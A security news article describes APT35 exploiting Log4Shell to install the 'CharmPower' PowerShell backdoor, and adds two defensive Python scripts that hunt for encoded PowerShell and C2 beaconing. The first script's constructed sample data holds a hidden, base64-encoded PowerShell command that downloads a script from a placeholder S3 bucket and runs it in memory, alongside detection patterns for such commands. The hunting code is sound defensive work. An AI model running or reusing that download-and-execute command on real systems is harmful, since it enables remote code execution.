Hackers linked to Iran’s state-sponsored APT35 group (also known as ‘Charming Kitten’ or ‘Phosphorus’) have been seen exploiting the Log4Shell flaw to install a new PowerShell backdoor. The modular payload handles C2 communication and system enumeration and, ultimately, receives, decrypts and loads further modules.
Log4Shell is the name given to CVE-2021-44228, a major remote code execution flaw in Apache Log4j discovered in December. According to Check Point researchers, APT35 was among the first to exploit the weakness before victims had a chance to apply security patches, scanning for vulnerable systems just days after it was made public.
Check Point attributes the exploitation activity to APT35 because the attacks were set up quickly on previously exposed infrastructure known to be used by the group. In the course of the investigation, the analysts also discovered a brand-new modular PowerShell backdoor known as ‘CharmPower.’
The exploit for CVE-2021-44228 causes a PowerShell command to be executed with a base64-encoded payload, which then fetches the ‘CharmPower’ core module from an attacker-controlled Amazon S3 bucket. The main functions of this core module are:
- Validate network connection
- Retrieve C&C domain
- Basic system enumeration
- Receive, decrypt, and execute follow-up modules
The core module sends HTTP POST requests to the C2; these either go unanswered or return a Base64 string, which triggers the download of a further PowerShell or C# module. ‘CharmPower’ decrypts and loads these modules, each of which then opens its own communication channel with the C2.
Based on the basic system information CharmPower gathers during the reconnaissance phase, the list of modules sent to the infected endpoint is assembled automatically. Check Point found similarities between ‘CharmPower’ and Android spyware APT35 has used before, such as the same logging methods and the same format and syntax.
In addition, both samples use the “Stack=Overflow” setting in C2 communications, a unique feature found only in APT35 tools. Check Point attributed the campaign to APT35 on the basis of these code similarities and infrastructure overlaps. ‘CharmPower’ shows how capable actors can respond swiftly to vulnerabilities such as CVE-2021-44228, combining code from previously released tools into something potent and effective that can evade security and detection layers.
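The delivery chain described above (an exploited Java process spawning PowerShell with a base64-encoded command that fetches a module from S3) leaves a recognisable trace in process-creation logs. The following Python hunter is an added example for this article, not code from Check Point or from the CharmPower analysis: it decodes PowerShell `-EncodedCommand` arguments (base64 of UTF-16LE text, a detail that trips up naive decoders) and flags decoded scripts that download and execute remote content. All log records, the bucket name and the path are constructed placeholders, not real indicators.

```python
"""Hunt process-creation logs for base64-encoded PowerShell commands, decode
them and flag scripts that fetch and run remote content.

Added example for this article, not code from Check Point or from the
CharmPower analysis; every log record below is constructed."""
import base64
import binascii
import re

# PowerShell's -EncodedCommand (and its -enc / -e short forms) takes base64 of
# the script text encoded as UTF-16LE, not UTF-8.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Cues that a decoded script pulls content from the network and executes it;
# the S3 host pattern follows the article's description of the loader.
REMOTE_FETCH_CUES = {
    "web-download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.IGNORECASE),
    "in-memory-exec": re.compile(r"invoke-expression|\biex\b", re.IGNORECASE),
    "s3-host": re.compile(r"\.s3\.amazonaws\.com|s3\.amazonaws\.com/", re.IGNORECASE),
}


def encode_for_powershell(script: str) -> str:
    """Build the base64/UTF-16LE form PowerShell expects (used here only to
    construct realistic sample records)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def classify(script: str) -> list:
    """Name every remote-fetch cue present in a decoded script."""
    return [name for name, rx in REMOTE_FETCH_CUES.items() if rx.search(script)]


def hunt(records):
    """records: iterable of (host, parent_image, command_line) tuples.
    Returns (host, parent_image, cues, decoded_script) for suspicious entries."""
    hits = []
    for host, parent, cmdline in records:
        script = decode_encoded_command(cmdline)
        if script is None:
            continue
        cues = classify(script)
        if cues:
            hits.append((host, parent, cues, script))
    return hits


# Constructed sample records. The third mimics the chain the article describes:
# a Java process (the vulnerable Log4j host) spawning PowerShell with an encoded
# command that pulls a script from an S3 bucket and runs it in memory.
# The bucket name and path are placeholders, not real indicators.
SAMPLE_RECORDS = [
    ("ws01", "explorer.exe", "powershell.exe -NoProfile -Command Get-Date"),
    ("ws01", "cmd.exe",
     "powershell.exe -enc " + encode_for_powershell("Get-ChildItem C:\\Temp | Measure-Object")),
    ("app03", "java.exe",
     "powershell.exe -w hidden -enc " + encode_for_powershell(
         "$m=(New-Object Net.WebClient).DownloadString("
         "'https://PLACEHOLDER-BUCKET.s3.amazonaws.com/PLACEHOLDER');"
         "Invoke-Expression $m")),
]

if __name__ == "__main__":
    for host, parent, cues, script in hunt(SAMPLE_RECORDS):
        print(f"{host}: {parent} -> powershell cues={cues}\n  {script}")
```

In a real deployment the records would come from Sysmon event 1 or Windows 4688 with command-line auditing enabled; a PowerShell child of a Java process is itself worth an alert even before the decoded script is inspected.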
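The C2 traits the article mentions (repeated HTTP POSTs answered with nothing or a bare Base64 string, and the “Stack=Overflow” marker) translate directly into a network-side check. The script below is an added example, not from Check Point's report: it runs over constructed proxy records, flags any request carrying the marker and flags source/host pairs whose POSTs are all answered with an empty body or a Base64 blob. It assumes the marker travels as a form field or query parameter; the hostnames and the module blob are placeholders.

```python
"""Flag outbound HTTP POST traffic with the beacon shape the article attributes
to CharmPower: repeated POSTs to one host that are answered with nothing or a
bare Base64 blob, plus requests carrying the 'Stack=Overflow' marker.

Added example, not from Check Point's report; the proxy records are constructed
and the hosts are placeholders."""
import base64
import binascii
import re
from collections import defaultdict

# A bare Base64 token of some length, which per the article is the only thing
# the C2 sends back when it has a module to deliver.
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")


def looks_like_base64_blob(body: str) -> bool:
    """True if the whole body is one syntactically valid Base64 token."""
    if not B64_BLOB.match(body):
        return False
    try:
        base64.b64decode(body, validate=True)
        return True
    except binascii.Error:
        return False


def analyse(records, min_posts: int = 3):
    """records: dicts with src, host, method, url, req_body, resp_body.
    Returns sorted (finding, src, host) tuples."""
    findings = set()
    posts = defaultdict(list)
    for r in records:
        # Assumption: the marker appears as a parameter in the URL or body.
        if "Stack=Overflow" in r["url"] or "Stack=Overflow" in r["req_body"]:
            findings.add(("stack-overflow-marker", r["src"], r["host"]))
        if r["method"] == "POST":
            posts[(r["src"], r["host"])].append(r)
    for (src, host), rs in posts.items():
        if len(rs) < min_posts:
            continue
        # Beacon shape: every reply is either empty or a bare Base64 blob.
        if all(r["resp_body"] == "" or looks_like_base64_blob(r["resp_body"]) for r in rs):
            findings.add(("post-beacon", src, host))
    return sorted(findings)


# Constructed blob standing in for a delivered follow-up module.
_MODULE_BLOB = base64.b64encode(b"constructed placeholder module bytes 0123456789").decode()


def _rec(src, host, method, url, req_body, resp_body):
    return {"src": src, "host": host, "method": method, "url": url,
            "req_body": req_body, "resp_body": resp_body}


SAMPLE_PROXY_LOG = [
    # Constructed beacon from an infected host; three empty replies, one module.
    _rec("10.0.0.5", "c2.example.invalid", "POST", "/api", "Stack=Overflow&id=HOSTA", ""),
    _rec("10.0.0.5", "c2.example.invalid", "POST", "/api", "Stack=Overflow&id=HOSTA", ""),
    _rec("10.0.0.5", "c2.example.invalid", "POST", "/api", "Stack=Overflow&id=HOSTA", _MODULE_BLOB),
    _rec("10.0.0.5", "c2.example.invalid", "POST", "/api", "Stack=Overflow&id=HOSTA", ""),
    # Constructed benign traffic: an internal app that answers POSTs with JSON.
    _rec("10.0.0.7", "intranet.example.internal", "POST", "/search", "q=quarterly", '{"hits": 3}'),
    _rec("10.0.0.7", "intranet.example.internal", "POST", "/search", "q=budget", '{"hits": 12}'),
    _rec("10.0.0.7", "intranet.example.internal", "POST", "/search", "q=travel", '{"hits": 0}'),
    _rec("10.0.0.7", "cdn.example.internal", "GET", "/logo.png", "", "PNG..."),
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_PROXY_LOG):
        print(finding)
```

The beacon heuristic on its own will also catch some legitimate telemetry endpoints, so in practice it is best treated as an enrichment that raises the priority of a host already flagged by the marker or by the PowerShell-from-Java process chain.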